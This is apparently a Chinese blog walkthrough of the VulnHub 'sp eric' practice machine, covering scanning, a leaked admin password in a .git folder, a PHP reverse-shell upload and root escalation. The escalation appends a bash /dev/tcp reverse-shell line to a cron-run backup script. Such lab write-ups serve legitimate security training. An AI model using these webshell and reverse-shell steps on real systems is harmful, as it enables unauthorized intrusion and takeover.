vulnhub靶机 sp eric(渗透测试详解)

最新推荐文章于 2024-08-14 15:09:27 发布
最新推荐文章于 2024-08-14 15:09:27 发布
阅读量266 收藏 2
点赞数 10
文章标签: 服务器 安全性测试 web安全 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78721909/article/details/141142251
版权

一、靶机信息收集

1、靶机下载地址

https://download.vulnhub.com/sp/eric-v1.0.0.7z

2、扫描靶机IP

3、探测靶机端口、主机、服务版本信息

nmap -sS -sV -A -p- 192.168.31.159

4、靶机目录扫描

扫描一些文件等信息

二、web渗透测试

1、访问靶机IP

2、 拼接访问 admin.php ,一个登录框,尝试sql注入,弱口令等,没有结果

3、查看目录扫描的.git文件

查看下载的源码,发现账号密码

admin:st@mpch0rdt.ightiRu$glo0mappL3

登录 admin 页面

登录成功,是个文件上传页面

4、 kali 生成反弹 shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

修改IP为kaliIP

上传文件,kali开启监听

访问 /upload/php-reverse-shell.php,成功反弹 shell

注意必须要访问upload下的文件

成功反弹

三、提权

1、采用交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

注意靶机没有python,但是有python3

2、 在 /home/eric 下发现了 backup.sh,backup.zip,flag.txt 这三个文件

查看 backup.sh

可能是个计划任务,查看一下

cat /etc/crontab

查看一下backup.sh文件

是个全权限

3、写入反弹 shell 的语句

echo 'bash -i >& /dev/tcp/192.168.31.159/1234 0>&1' >> backup.sh

kali 开启监听

等待几分钟后

成功反弹

芜丶湖
关注
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
vulnhub靶机 Lazysysadmin(渗透测试详解
2301_78721909的博客
08-11 290
vulnhub靶机 Lazysysadmin(渗透测试详解
Vulnhub靶机 RickdiculouslyEasy(渗透测试详解
2301_78721909的博客
08-03 366
Vulnhub靶机 RickdiculouslyEasy 渗透详解(from 芜湖)
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1513
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机 Depth(渗透测试
2301_78721909的博客
07-29 328
Vulnhub靶机 Depth(from wuhu)
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 966
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
Vulnhub靶机 Fristileaks 1.3(渗透测试详解
2301_78721909的博客
08-01 370
Vulnhub靶机 Fristileaks 1.3 详解(from wuhu)
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1700
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
渗透测试学习之vulnhub系列靶机——DC1
jingzhou_666的博客
06-09 1805
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,使用VMware即可直接运行。Drupal 是一个灵活的,基于 LAMP 技术栈的 CMS,它的模块化设计,允许通过安装和卸载模块的方式 添加和移除功能,同时,允许通过安装和卸载主题改变整个网站的视觉感观。在kali当中使用msf查看一下针对这个cms有哪些具体的模块可以使用使用模块弹出 meterpreter >代表利用成功可以继续进行后渗透3、漏洞利用。
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2528
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
16 交换机命令行配置
weixin_48089507的博客
08-11 215
【代码】15 交换机命令行配置。
Linux日常运维小结
最新发布
lza20001103的博客
08-14 344
Linux日常运维小结
服务器数据恢复—raid5阵列热备盘未全部启用导致阵列崩溃的数据恢复案例
beiya123的博客
08-14 103
服务器存储数据恢复环境: 一台EMC某型号存储中有一组RAID5磁盘阵列。该raid5阵列中有12块硬盘,其中2块硬盘为热备盘。 服务器存储故障: 该存储raid5阵列中有两块硬盘离线,只有1块热备盘启用替换掉其中一块离线盘,另外1块热备盘未成功启用,raid5阵列崩溃,存储不可用。 磁盘阵列中硬盘离线的原因通常是磁盘存在物理故障或者硬盘出现坏道。由于EMC存储中的raid控制器的磁盘检查策略十分严格,经常将硬盘的性能不稳定判定为硬件故障并将该硬盘踢出raid。
将A服务器上指定文件夹中的文件,批量同步到B服务器
大数据-攻城狮
08-14 76
【代码】将A服务器上指定文件夹中的文件,批量同步到B服务器上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值